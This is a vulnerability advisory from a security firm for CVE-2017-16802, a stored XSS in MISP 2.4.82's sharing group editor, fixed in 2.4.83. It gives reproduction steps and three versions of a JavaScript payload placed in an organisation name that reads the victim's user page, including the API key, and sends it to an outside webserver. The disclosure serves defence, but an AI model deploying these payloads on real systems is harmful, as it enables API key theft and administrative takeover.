We are reliable, trustworthy, and ready for challenges! Hire Us
MISP – XSS in the sharingGroupPopulateOrganisations
- Home
- Advisories
- MISP – XSS in the sharingGroupPopulateOrganisations
VULNERABILITY
XSS in the sharingGroupPopulateOrganisations function
DATE
13.11.2017
Affected Vendor
CIRCL – Computer Incident Response Center Luxembourg
Affected Product
MISP – Malware Information Sharing Platform & Open Standards For Threat Information Sharing – https://www.misp-project.org/
Vulnerable version
2.4.82
Fixed version
2.4.83
CVSS
4.4 Medium CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
Recommendations
Update to MISP version 2.4.83
Vulnerability details
There is an XSS in ‘Edit Sharing Group’ area of MISP.
Easiest way to reproduce it:
- Create new organization with the following name:
<script>alert('XSS');</script>
- Go to /Global Actions > List Sharing Groups/
- Edit existing sharing group or add new
- Go to Organisations tab
- Add Local Organisation
- Select
<script>alert('XSS');</script>
and move to right by >> - Click Add
It could be done the same way from Add Remote Organisation.
One possible scenario is that some organisation which we trust synchronizes with ours and we want to add them to some sharing group.
This means that attack requires admin iteraction but the attacker can gain full admin access to victim MISP by stealing API key.
Stealing the API key from /users/view/me.
There is some fake name prepended to be displayed by a victim but not the actual payload.
Replace https://misp2.local with your controlled webserver and check logs after trying.
Follow the above steps to reproduce and put the following as an organisation name:PUBLIC-NORTH-ATLANTIC-ORGANIZATION<script>$.get('/users/view/me',function(d){s=d.indexOf('<h2>User</h2>');e=d.indexOf('<div class="actions debugOff sideMenu',s);if(s>e)e=s*99;i=d.substring(s,e);$.get('https://misp2.local/'+escape(i));});</script>
Clear version:
PUBLIC-NORTH-ATLANTIC-ORGANIZATION<script>$.get('/users/view/me',function(d){
pos_start = d.indexOf('<h2>User</h2>');
pos_end = d.indexOf('<div class="actions debugOff sideMenu">',
pos_start);
if(pos_start > pos_end) pos_end = pos_start*99;
interested = d.substring(pos_start, pos_end);
$.get('https://misp2.local/'+escape(interested));
});</script>
Short version:
PUBLIC-NORTH-ATLANTIC-ORGANIZATION<script>$.get('/users/view/me',function(d){$.get('https://misp2.local/'+escape(d));});</script>
CVE
CVE-2017-16802
Credits
Dawid Czarnecki
Do you think the security of your data might be lacking? Let's find the best approach together.
Once you contact us, we will ask you about the project you want to secure.